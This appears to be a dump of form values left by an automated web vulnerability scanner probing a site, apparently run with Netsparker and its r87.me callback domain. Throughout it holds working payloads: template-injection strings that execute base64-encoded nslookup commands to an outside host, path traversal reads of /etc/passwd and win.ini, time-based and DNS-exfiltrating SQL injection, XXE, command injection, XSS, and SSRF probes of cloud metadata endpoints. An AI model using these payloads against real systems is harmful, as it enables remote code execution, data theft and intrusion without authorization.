  • : {{= global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bGNnYmphMXhsZWE2bmxvbnYyYnl3bHg2ZWhlNHNwbXVtaS5yODcubWU=','base64').toString())}}
  • :
  • 3: 04426711537/trace.axd
  • 3: {{= global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bHNodTVvcHdsNnZwN2h6MjVqYmRuaGdzNHR0cGQxbWxmcy5yODcubWU=','base64').toString())}}
  • : http://127.0.0.1:3306
  • :
  • 3: 0x24.6001503/trace.axd
  • : {{range.constructor("return global.process.mainModule.require('child_process').execSync('nslookup acmpznnyxlqeimdcbdbpaubm-otq4vnep2-fiuzc" + "lfq.r87.me')")()}}
  • 3: 3
  • 3: 0x24.91.147.95/trace.axd
  • 3: http://127.0.0.1:3306
  • 3: 3
  • 3: {{range.constructor("return global.process.mainModule.require('child_process').execSync('nslookup acmpznnyxl6p91hq61r50bxswwq__dus430dtmue" + "wji.r87.me')")()}}
  • 3: 0x24.91.37727/trace.axd
  • :
  • : http://36.91.147.95:3306
  • : = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bHF1bXpzaGVicjB1cWJlanl6aXhqcW1teW92ZmNxeGVxay5yODcubWU=','base64').toString())
  • 3: 0x245b935f/trace.axd
  • :
  • 3: 3
  • 3: = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bGN3dTEzamgyNTRkcjVtbXM3Y2FqeHd0bm1xaHJxdHl1by5yODcubWU=','base64').toString())
  • 3: http://36.91.147.95:3306
  • 3: 1603492644/trace.axd
  • : <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bGktbnk5YnV0dmpqZDNhcmZsbm01YWd0a2N1emtyZjF6dS5yODcubWU=','base64').toString()) %>
  • 3: 3
  • :
  • 3: 36.6001503/trace.axd
  • :
  • :
  • :
  • : http://::1:3306
  • 3: <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgYWNtcHpubnl4bGFicGJpY3hjc3hyLTJubngybXVoaTlhYzlsbWVsaDFwYy5yODcubWU=','base64').toString()) %>
  • 3: 36.91.147.95/trace.axd
  • :
  • 3: 3
  • : {php}Smarty_Resource::parseResourceName(system("nslookup acmpznnyxlwivkn6fz2my1agtcv5hdwfwxvb6akx"."yww.r87.me"),'b');{/php}
  • 3: 36.91.37727/trace.axd
  • 3: http://::1:3306
  • 3: {php}Smarty_Resource::parseResourceName(system("nslookup acmpznnyxl77uenfs6pmbklnmc3djnkolkapq1gh"."izm.r87.me"),'b');{/php}
  • 3:
  • : 000177.000.00000.000001/trace.axd
  • :
  • : {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup acmpznnyxlwsjd1v17zcnys2iosluxkx2yoz82jq"~"kf4.r87.me")}}
  • : 0177.0.0.1/trace.axd
  • : http://[::1]:3306
  • :
  • 3: 3
  • 3: {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup acmpznnyxlk0atlu6ygoii9sfz3xkm-dmy_otz_n"~"geq.r87.me")}}
  • : 0177.0.1/trace.axd
  • 3: http://[::1]:3306
  • : <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgYWNtcHpubnl4bG9vLWpodGp6anA5bnp1cHd2MTdjbXVxYzk4eHQwa3ZuZS5yODcubWU=')})).to_s}" %>
  • : 0177.1/trace.axd
  • :
  • 3:
  • 3: <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgYWNtcHpubnl4bHRsZ3d2bGpnYnlzbndod3J6OXlwczFxYTJkY2t4MWxsYy5yODcubWU=')})).to_s}" %>
  • : 017700000001/trace.axd
  • : https://rsalramelan.com/server-status
  • : <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<bnNsb29rdXAgYWNtcHpubnl4bGJ2MmlxcnQ2cnVxb3Joa213ZnNnenZhOXpoaGotb2l6MC5yODcubWU=|{base64,--decode})}") }
  • 3: 3
  • : 0x7f.0.0.1/trace.axd
  • :
  • 3: <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<bnNsb29rdXAgYWNtcHpubnl4bHNlaGN2Zm4tamloMndtOTEtc2FodmZtYy1ieTV3Y3E1aS5yODcubWU=|{base64,--decode})}") }
  • 3: https://rsalramelan.com/server-status
  • : 0x7f.0.1/trace.axd
  • :
  • : <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup acmpznnyxlrkfbsr6ny_rgjgorlumy8n8unmqsza"+"-fa.r87.me") }
  • 3:
  • : 0x7f.1/trace.axd
  • 3: <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup acmpznnyxlnjpie2mdwkwl4b4zpqbnqiseglfk9c"+"7qi.r87.me") }
  • : http://169.254.169.254/opc/v1/instance
  • 3: 3
  • : 0x7f000001/trace.axd
  • :
  • : #set($engine="") #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {eval,$({tr,/+,_-}<<<bnNsb29rdXAgYWNtcHpubnl4bHppb3NjcHRrdm1lZXpnaWh0d2lydXAzMjd2LXhzZ3hobS5yODcubWU=|{base64,--decode})}")) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end ${output}
  • : 127.0.0.1/trace.axd
  • 3: http://169.254.169.254/opc/v1/instance
  • :
  • 3:
  • 3: #set($engine="") #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {eval,$({tr,/+,_-}<<<bnNsb29rdXAgYWNtcHpubnl4bHh1aWx1eHpvNWhlZ2JuZ3pmYmRreHZ3NmpfazVtdnJ1Zy5yODcubWU=|{base64,--decode})}")) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end ${output}
  • : 127.0.1/trace.axd
  • : https://metadata.packet.net/metadata
  • : #set($engine="") #set($cmd="cmd.exe /c nslookup acmpznnyxl03vfrmzo47iqieknd0ztm7szajeitn"+"jts.r87.me")#set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec($cmd)) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end ${output}
  • :
  • 3: 3
  • : 127.1/trace.axd
  • 3: #set($engine="") #set($cmd="cmd.exe /c nslookup acmpznnyxllhbanahxizvjvn6bza0dssams3remv"+"cuc.r87.me")#set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec($cmd)) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end ${output}
  • 3: https://metadata.packet.net/metadata
  • : 16777343/trace.axd
  • : require 'resolv';Resolv.getaddress ("acmpznnyxlmn01itbhl81iomoqvepx2y1j-jq3r-".concat "qye.r87.me")
  • :
  • 3:
  • : 00044.00133.0000223.00000137/trace.axd
  • 3: require 'resolv';Resolv.getaddress ("acmpznnyxlp9qbogcg-evytzpm9he6knujaoajiq".concat "fxa.r87.me")
  • : 044.6001503/trace.axd
  • 3: 3
  • : __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgYWNtcHpubnl4bGhrMGVqY3ZpMXFzaXByaXhianotb2RpbGExZ2d3bG5zNC5yODcubWU=')).read()
  • : 044.91.147.95/trace.axd
  • : 044.91.37727/trace.axd
  • 3: __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgYWNtcHpubnl4bGNyb2dvaHk5bmN2c3RiLTJwODd3c3FzNjd0ZXBobDdrdS5yODcubWU=')).read()
  • :
  • : 04426711537/trace.axd
  • : 0x24.6001503/trace.axd
  • : 0x24.91.147.95/trace.axd
  • : 0x24.91.37727/trace.axd
  • : 0x245b935f/trace.axd
  • : 1603492644/trace.axd
  • : 36.6001503/trace.axd
  • : 36.91.147.95/trace.axd
  • : 36.91.37727/trace.axd
  • 3: 3
  • 3: 000177.000.00000.000001/trace.axd
  • 3: 0177.0.0.1/trace.axd
  • 3: 0177.0.1/trace.axd
  • 3: 0177.1/trace.axd
  • 3: 017700000001/trace.axd
  • 3: 0x7f.0.0.1/trace.axd
  • 3: 0x7f.0.1/trace.axd
  • 3: 0x7f.1/trace.axd
  • : /../../../../../../../../../../boot.ini
  • 3: 0x7f000001/trace.axd
  • 3: 127.0.0.1/trace.axd
  • 3: 127.0.1/trace.axd
  • 3: 127.1/trace.axd
  • 3: 16777343/trace.axd
  • 3: 00044.00133.0000223.00000137/trace.axd
  • 3: 044.6001503/trace.axd
  • 3: 044.91.147.95/trace.axd
  • 3: 044.91.37727/trace.axd
  • 3: 04426711537/trace.axd
  • 3: 0x24.6001503/trace.axd
  • 3: /../../../../../../../../../../boot.ini
  • 3: 0x24.91.147.95/trace.axd
  • 3: 0x24.91.37727/trace.axd
  • 3: 0x245b935f/trace.axd
  • 3: 1603492644/trace.axd
  • 3: 36.6001503/trace.axd
  • : /../../../../../../../../../../boot.ini.php
  • 3: 36.91.147.95/trace.axd
  • 3: /../../../../../../../../../../boot.ini.php
  • 3: 36.91.37727/trace.axd
  • : 1/../../../../../../../../../../boot.ini
  • 3: 1/../../../../../../../../../../boot.ini
  • : file:///boot.ini
  • 3: file:///boot.ini
  • : c:\boot.ini
  • 3: c:\boot.ini
  • : ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
  • 3: ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
  • : %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  • 3: %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  • : file%3a%2f%2f%2fboot.ini
  • 3: file%3a%2f%2f%2fboot.ini
  • : c%3a%5cboot.ini
  • 3: c%3a%5cboot.ini
  • : /../../../../../../../../../../web.config
  • 3: /../../../../../../../../../../web.config
  • : /../../../../../../../../../../windows/win.ini
  • 3: /../../../../../../../../../../windows/win.ini
  • : file:///windows/win.ini
  • 3: file:///windows/win.ini
  • : /../../../../../../../../../../windows/win.ini.php
  • 3: /../../../../../../../../../../windows/win.ini.php
  • : c:\windows\win.ini
  • 3: c:\windows\win.ini
  • : ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
  • 3: ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
  • : ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
  • 3: ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
  • : .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini
  • 3: .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini
  • : . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini
  • 3: . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini
  • : /../../../../../../../../../../windows/iis6.log
  • 3: /../../../../../../../../../../windows/iis6.log
  • : /../../../../../../../../../../proc/self/fd/2
  • 3: /../../../../../../../../../../proc/self/fd/2
  • : /../../../../../../../../../../proc/self/fd/2.php
  • 3: /../../../../../../../../../../proc/self/fd/2.php
  • : /../../../../../../../../../../etc/httpd/logs/error.log
  • 3: /../../../../../../../../../../etc/httpd/logs/error.log
  • : /../../../../../../../../../../etc/httpd/logs/error_log
  • 3: /../../../../../../../../../../etc/httpd/logs/error_log
  • : /../../../../../../../../../../var/log/apache2/error.log
  • 3: /../../../../../../../../../../var/log/apache2/error.log
  • : /../../../../../../../../../../var/log/apache/error.log
  • 3: /../../../../../../../../../../var/log/apache/error.log
  • : /../../../../../../../../../../proc/version
  • 3: /../../../../../../../../../../proc/version
  • : /../../../../../../../../../../proc/version.php
  • 3: /../../../../../../../../../../proc/version.php
  • : /../../../../../../../../../../../etc/passwd
  • 3: /../../../../../../../../../../../etc/passwd
  • : file:///etc/passwd
  • 3: file:///etc/passwd
  • : /../../../../../../../../../../../etc/passwd
  • 3: /../../../../../../../../../../../etc/passwd
  • : /../../../../../../../../../../../etc/passwd.php
  • 3: /../../../../../../../../../../../etc/passwd.php
  • : ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
  • 3: ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
  • : ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
  • 3: ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
  • : .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
  • 3: .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
  • : . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
  • 3: . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
  • : 1/../../../../../../../../../../../etc/passwd
  • 3: 1/../../../../../../../../../../../etc/passwd
  • : /etc/passwd
  • 3: /etc/passwd
  • : %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  • 3: %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  • : data:;base64,TlM3NzU0NTYxNDQ2NTc1
  • 3: data:;base64,TlM3NzU0NTYxNDQ2NTc1
  • : create
  • 3: create
  • : create
  • 3: create
  • : /admin/kontak/konten/create
  • 3: /admin/kontak/konten/create
  • : /kontak/konten/create
  • 3: /kontak/konten/create
  • : /konten/create
  • 3: /konten/create
  • : /create
  • 3: /create
  • : \create
  • 3: \create
  • : \admin\kontak\konten\create
  • 3: \admin\kontak\konten\create
  • : \kontak\konten\create
  • 3: \kontak\konten\create
  • : \konten\create
  • 3: \konten\create
  • : WEB-INF/web.xml
  • 3: WEB-INF/web.xml
  • : /../../../../../../../../../../WEB-INF/web.xml
  • 3: /../../../../../../../../../../WEB-INF/web.xml
  • : /../../../../../../../../../../var/log/apache2/access.log
  • 3: /../../../../../../../../../../var/log/apache2/access.log
  • : /../../../../../../../../../../etc/httpd/logs/access.log
  • 3: /../../../../../../../../../../etc/httpd/logs/access.log
  • : /../../../../../../../../../../var/log/nginx/access.log
  • 3: /../../../../../../../../../../var/log/nginx/access.log
  • : /../../../../../../../../../../opt/lampp/logs/access_log
  • 3: /../../../../../../../../../../opt/lampp/logs/access_log
  • : /../../../../../../../../../../var/log/lighttpd/access.log
  • 3: /../../../../../../../../../../var/log/lighttpd/access.log
  • : /../../../../../../../../../../AppServ/Apache24/logs/access.log
  • 3: /../../../../../../../../../../AppServ/Apache24/logs/access.log
  • : ../../../../../../../../../../xampp/apache/logs/access.log
  • 3: ../../../../../../../../../../xampp/apache/logs/access.log
  • : /../../../../../../../../../../var/log/apache/access.log
  • 3: /../../../../../../../../../../var/log/apache/access.log
  • %27:
  • -1 OR 1=1: 3
  • %27: 3
  • -1 OR 1=1: 3
  • -1 OR 1=1: 3
  • ' WAITFOR DELAY '0:0:25'--:
  • n3tsp4rke2:
  • -1 OR 1=1: 3
  • nxtspxrkex:
  • N3TSP4RKE2:
  • (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns):
  • ': 3
  • ' WAITFOR DELAY '0:0:25'--: 3
  • '"--></style></scRipt><scRipt>netsparker(0x063C4F)</scRipt>:
  • NS-1NO: 3
  • (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns): 3
  • "& SET /A 0xFFF9999-45198 &:
  • 1 WAITFOR DELAY '0:0:25'--:
  • "& ping -n 25 127.0.0.1 &:
  • '"--></style></scRipt><scRipt>netsparker(0x063C50)</scRipt>: 3
  • -1 AND 'NS='ss: 3
  • '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +':
  • 1 WAITFOR DELAY '0:0:25'--: 3
  • "& SET /A 0xFFF9999-17787 &: 3
  • "& ping -n 25 127.0.0.1 &: 3
  • %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x063C94%29%3C%2FscRipt%3E:
  • -1' OR 1=1 OR 'ns'='ns: 3
  • /../../../../../../../../../../boot.ini:
  • hTTp://r87.com/n:
  • '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +': 3
  • response.write(268409241-94478)':
  • WAITFOR DELAY '0:0:25'--:
  • '& SET /A 0xFFF9999-12357 &:
  • '& ping -n 25 127.0.0.1 &:
  • -1" OR 1=1 OR "ns"="ns: 3
  • %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x063C95%29%3C%2FscRipt%3E: 3
  • /../../../../../../../../../../boot.ini: 3
  • convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))):
  • hTTp://r87.com/n: 3
  • {{268409241-48441}}:
  • WAITFOR DELAY '0:0:25'--: 3
  • response.write(268409241-37433)': 3
  • '& SET /A 0xFFF9999-21267 &: 3
  • -1 OR 17-7=10: 3
  • '& ping -n 25 127.0.0.1 &: 3
  • convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))): 3
  • 1'"--></style></scRipt><scRipt>netsparker(0x063DB8)</scRipt>:
  • http://r87.com/n?.php:
  • /../../../../../../../../../../boot.ini.php:
  • {{268409241-51932}}: 3
  • 1) WAITFOR DELAY '0:0:25'--:
  • +response.write(268409241-89112)':
  • & SET /A 0xFFF9999-31164 &:
  • -1 OR X='ss: 3
  • & ping -n 25 127.0.0.1 &:
  • 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=':
  • 1'"--></style></scRipt><scRipt>netsparker(0x063DB9)</scRipt>: 3
  • /../../../../../../../../../../boot.ini.php: 3
  • http://r87.com/n?.php: 3
  • 1) WAITFOR DELAY '0:0:25'--: 3
  • ${268409241-79812}:
  • +response.write(268409241-96692)': 3
  • -1' OR 1=1 OR '1'='1: 3
  • & SET /A 0xFFF9999-26121 &: 3
  • & ping -n 25 127.0.0.1 &: 3
  • 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=': 3
  • data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDYzREM2KTwvc2NyaXB0Pg==:
  • 1/../../../../../../../../../../boot.ini:
  • ') WAITFOR DELAY '0:0:25'--:
  • http://r87.com/n?.php:
  • ${268409241-35374}: 3
  • "+response.write(268409241-58143)+":
  • -1' OR 1=1 OR '1'='1: 3
  • SET /A 0xFFF9999-98921 &:
  • ping -n 25 127.0.0.1 &:
  • data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDYzREM3KTwvc2NyaXB0Pg==: 3
  • 1/../../../../../../../../../../boot.ini: 3
  • ') WAITFOR DELAY '0:0:25'--: 3
  • http://r87.com/n?.php: 3
  • -1" OR 1=1 OR "1"="1: 3
  • "+response.write(268409241-79188)+": 3
  • =268409241-78789:
  • SET /A 0xFFF9999-75714 &: 3
  • ping -n 25 127.0.0.1 &: 3
  • '" ns=netsparker(0x063DD2):
  • file:///boot.ini:
  • ')) WAITFOR DELAY '0:0:25'--:
  • -1" OR 1=1 OR "1"="1: 3
  • php://filter//resource=http://r87.com/n?.php:
  • <% response.write(268409241-58594) %>:
  • =268409241-57422: 3
  • SET /A 0xFFF9999-74879:
  • "&ping -w 25 127.0.0.1 &":
  • '" ns=netsparker(0x063DD3): 3
  • ')) WAITFOR DELAY '0:0:25'--: 3
  • -1 OR 1=1: 3
  • file:///boot.ini: 3
  • php://filter//resource=http://r87.com/n?.php: 3
  • <% response.write(268409241-15140) %>: 3
  • {{=268409241-7069}}:
  • SET /A 0xFFF9999-58506: 3
  • "&ping -w 25 127.0.0.1 &": 3
  • 1 ns=netsparker(0x063DE0):
  • 1)) WAITFOR DELAY '0:0:25'--:
  • -1 OR 1=1: 3
  • c:\boot.ini:
  • r87.com/n:
  • print(int)0xFFF9999-39369:
  • {{=268409241-26371}}: 3
  • ns:netsparker056650=vuln:
  • | SET /A 0xFFF9999-14892:
  • '&ping -w 25 127.0.0.1 &':
  • 1 ns=netsparker(0x063DE1): 3
  • 1)) WAITFOR DELAY '0:0:25'--: 3
  • -1 OR 1=1: 3
  • c:\boot.ini: 3
  • r87.com/n: 3
  • print(int)0xFFF9999-38600: 3
  • <%- 268409241-49811 %>:
  • | SET /A 0xFFF9999-22816: 3
  • ns:netsparker056650=vuln: 3
  • '&ping -w 25 127.0.0.1 &': 3
  • //r87.com/n/n.css?0x063DF5:
  • 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--:
  • -1 OR 1=1: 3
  • :
  • print(int)0xFFF9999-79288;:
  • 1";expr 268409241 - 29967;":
  • <%- 268409241-89284 %>: 3
  • http://example.com/? ns: netsparker056650=vuln:
  • &ping -w 25 127.0.0.1 &:
  • (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))):
  • //r87.com/n/n.css?0x063DF6: 3
  • ': 3
  • 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--: 3
  • 3: 3
  • 1";expr 268409241 - 72052;": 3
  • print(int)0xFFF9999-44704;: 3
  • #set($c=268409241 - 91082) ${c}:
  • http://example.com/? ns: netsparker056650=vuln: 3
  • &ping -w 25 127.0.0.1 &: 3
  • (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))): 3
  • NS-1NO: 3
  • //r87.com/n/j/?0x063E59:
  • 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--:
  • %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini:
  • 1';expr 268409241 - 38127;':
  • :
  • #set($c=268409241 - 86148) ${c}: 3
  • ping -w 25 127.0.0.1 &:
  • ns:netsparker056650=vuln:
  • +print(int)0xFFF9999-81456;//:
  • -1 AND 'NS='ss: 3
  • //r87.com/n/j/?0x063E5A: 3
  • 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--: 3
  • 1';expr 268409241 - 94731;': 3
  • %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini: 3
  • 3: 3
  • <#assign x=268409241 - 53851> ${x?string["0"]}:
  • ping -w 25 127.0.0.1 &: 3
  • http://r87.com/?rsalramelan.com/:
  • ns:netsparker056650=vuln: 3
  • -1' OR 1=1 OR 'ns'='ns: 3
  • +print(int)0xFFF9999-87003;//: 3
  • ${28275*28275-(35201)}:
  • 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--:
  • 1;expr 268409241 - 46558;x:
  • '><net sparker=netsparker(0x063ED2)>:
  • <#assign x=268409241 - 6654> ${x?string["0"]}: 3
  • :
  • file%3a%2f%2f%2fboot.ini:
  • ping -n 25 127.0.0.1:
  • http://r87.com/?rsalramelan.com/: 3
  • -1" OR 1=1 OR "ns"="ns: 3
  • ns:netsparker056650=vuln:
  • '+print(int)0xFFF9999-59472+':
  • ${28275*28275-(91724)}: 3
  • 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--: 3
  • '><net sparker=netsparker(0x063ED3)>: 3
  • 1;expr 268409241 - 89054;x: 3
  • <%= "#{268409241-32160}" %>:
  • file%3a%2f%2f%2fboot.ini: 3
  • ping -n 25 127.0.0.1: 3
  • 3: 3
  • http://r87.com/?rsalramelan.com/:
  • -1 OR 17-7=10: 3
  • '+print(int)0xFFF9999-44286+': 3
  • ns:netsparker056650=vuln: 3
  • #{28275*28275-(6258)}:
  • "><net sparker=netsparker(0x063F32)>:
  • :
  • expr 268409241 - 92596;:
  • : 3
  • <%= "#{268409241-4692}" %>: 3
  • :
  • c%3a%5cboot.ini:
  • 3: 3
  • ping -w 25 127.0.0.1:
  • :
  • 3:
  • :
  • http://r87.com/?rsalramelan.com/: 3
  • -1 OR X='ss: 3
  • (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL):
  • "+print(int)0xFFF9999-85824+":
  • :
  • #{28275*28275-(96926)}: 3
  • "><net sparker=netsparker(0x063F33)>: 3
  • expr 268409241 - 12944;: 3
  • N3tSp4rK3R:
  • c%3a%5cboot.ini: 3
  • ping -w 25 127.0.0.1: 3
  • :
  • 3: 3
  • https://r87.com/?rsalramelan.com/:
  • -1' OR 1=1 OR '1'='1: 3
  • (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL): 3
  • "+print(int)0xFFF9999-17409+": 3
  • 3: 3
  • :
  • <iMg src=N onerror=netsparker(0x063F3E)>:
  • expr 268409241 - 3595:
  • |ping -n 25 127.0.0.1:
  • N3tSp4rK3R: 3
  • /../../../../../../../../../../web.config:
  • :
  • https://r87.com/?rsalramelan.com/: 3
  • 3: 3
  • -1' OR 1=1 OR '1'='1: 3
  • <?=(int)0xFFF9999-57259;//?>:
  • NSFTW:
  • <iMg src=N onerror=netsparker(0x063F3F)>: 3
  • :
  • 3: 3
  • expr 268409241 - 30124: 3
  • |ping -n 25 127.0.0.1: 3
  • :
  • /../../../../../../../../../../web.config: 3
  • 3: 3
  • //r87.com/?http://rsalramelan.com/:
  • -1" OR 1=1 OR "1"="1: 3
  • :
  • -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1:
  • <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>:
  • <?=(int)0xFFF9999-26555;//?>: 3
  • NSFTW: 3
  • 3: 3
  • javascript:netsparker(0x063F4A):
  • <!--#exec cmd="expr 268409241 - 85284"-->:
  • :
  • :
  • 3: 3
  • : hTTp://r87.com/n
  • //r87.com/?http://rsalramelan.com/: 3
  • -1" OR 1=1 OR "1"="1: 3
  • /../../../../../../../../../../windows/win.ini:
  • -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1: 3
  • 3: 3
  • <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>: 3
  • {php}print(int)0xFFF9999-30789;{/php}:
  • :
  • '+NSFTW+':
  • javascript:netsparker(0x063F4B): 3
  • <!--#exec cmd="expr 268409241 - 68643"-->: 3
  • 3: 3
  • 3: 3
  • : N3tSp4rK3R
  • 3: hTTp://r87.com/n
  • r87.com/?rsalramelan.com/:
  • 3: 3
  • /../../../../../../../../../../windows/win.ini: 3
  • ((select sleep(25)))a-- 1:
  • :
  • &thisdoesntexists;:
  • {php}print(int)0xFFF9999-14683;{/php}: 3
  • '+NSFTW+': 3
  • 3: 3
  • NS09?s1?DBL?SNGL?NS09:
  • <scRipt>ns(0x063FAD)</scRipt>:
  • :
  • |expr${IFS}268409241${IFS}-${IFS}91298:
  • : ${28275*28275-(26180)}
  • 3: N3tSp4rK3R
  • : http://r87.com/n?.php
  • r87.com/?rsalramelan.com/: 3
  • 3: 3
  • file:///windows/win.ini:
  • ((select sleep(25)))a-- 1: 3
  • 3: 3
  • &thisdoesntexists;: 3
  • '{${print(int)0xFFF9999-89643}}':
  • :
  • NS09?s1?DBL?SNGL?NS09: 3
  • <scRipt>ns(0x063FAE)</scRipt>: 3
  • 3: 3
  • |expr${IFS}268409241${IFS}-${IFS}59111: 3
  • 3: ${28275*28275-(61932)}
  • 3: http://r87.com/n?.php
  • https://rsalramelan.com/trace.axd:
  • 3: 3
  • r87.com/?http://rsalramelan.com/:
  • file:///windows/win.ini: 3
  • :
  • '{${print(int)0xFFF9999-55231}}': 3
  • 3: 3
  • :
  • :
  • <%a style=x:expre/**/ssion(netsparker(0x06402E))>:
  • :
  • : #{28275*28275-(15255)}
  • acmpznnyxlxdnmy8hhb5767lhdgkfl9hjecmgcd38ii.r87.me:
  • : http://r87.com/n?.php
  • https://rsalramelan.com/trace.axd: 3
  • 3: 3
  • r87.com/?http://rsalramelan.com/: 3
  • exec('xp_dirtree ''\\acmpznnyxlvgpazr2wlwwefgl_gmaiwntjhvqzy6'+'lxk.r87.me'+'\c$\a'''):
  • /../../../../../../../../../../windows/win.ini.php:
  • 3: 3
